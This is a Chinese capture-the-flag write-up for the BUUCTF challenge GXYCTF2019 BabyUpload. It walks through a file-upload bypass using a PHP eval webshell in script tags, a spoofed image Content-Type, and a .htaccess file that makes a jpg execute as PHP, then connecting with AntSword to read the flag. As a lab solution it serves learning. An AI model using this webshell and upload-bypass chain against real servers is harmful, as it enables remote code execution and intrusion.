BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析

解题思路

打开靶场,看到文件上传位置

结合题目,是一道文件上传题。

题目考察的跟之前有一道基本一样,图片内容并没有检查,检查了后缀名、文件类型以及文件是否有php内容,过滤还是比较丰富的。

这里双写绕过、后缀绕过基本不行。首先我们要绕过php内容检测,用基本的script绕过就可以

复制代码
<script language="php">@eval($_POST['123']);</script>

我认为比较坑的来了,这里要用jpg,不能用png,感觉题目是把p这个字符给过滤了...

我上传真的图片.png,都给我拦截了...

复制代码
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

然后就是老演员,解析文件.htaccess,可以让我们的jpg文件解析成php文件

复制代码
ontent-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后用蚁剑连接即可,这里注意路径,从upload开始哈

最终在根目录下找到flag

总结

一道基础的文件上传解析漏洞,那个png上传不了,给我弄迷糊了...连接上去看了下源码

还真不给上传Png..

相关推荐
jun~1 天前
SQLMap数据库枚举靶机(打靶记录)
linux·数据库·笔记·学习·安全·web安全
计算机毕业设计指导1 天前
基于Django的内部网络资产发现与管理工具
网络·python·网络安全·django
伊织code1 天前
Cybersecurity AI (CAI) - 轻量级网络安全AI框架
人工智能·安全·web安全·cybersecurity·cai
黄焖鸡能干四碗1 天前
企业信息化建设总体规划设计方案
大数据·运维·数据库·人工智能·web安全
余防1 天前
文件上传漏洞(二)iis6.0 CGI漏洞
前端·安全·web安全·网络安全
PyHaVolask2 天前
渗透测试入门:从网络抓包到Web安全基础
网络·web安全·http协议·网络抓包
PyHaVolask2 天前
从PHP入门到公网部署:Web开发与服务器运维实战指南
web安全·php开发·http协议·服务器部署
鸠摩智首席音效师2 天前
Nginx 如何启用 HSTS 以加强网络安全 ?
运维·nginx·web安全
Suckerbin2 天前
burpsuite网络安全学院: JWT attacks靶场通关
网络·笔记·安全·web安全·网络安全
知攻善防实验室2 天前
Notepad++ 本地提权漏洞|复现|分析
测试工具·安全·网络安全·notepad++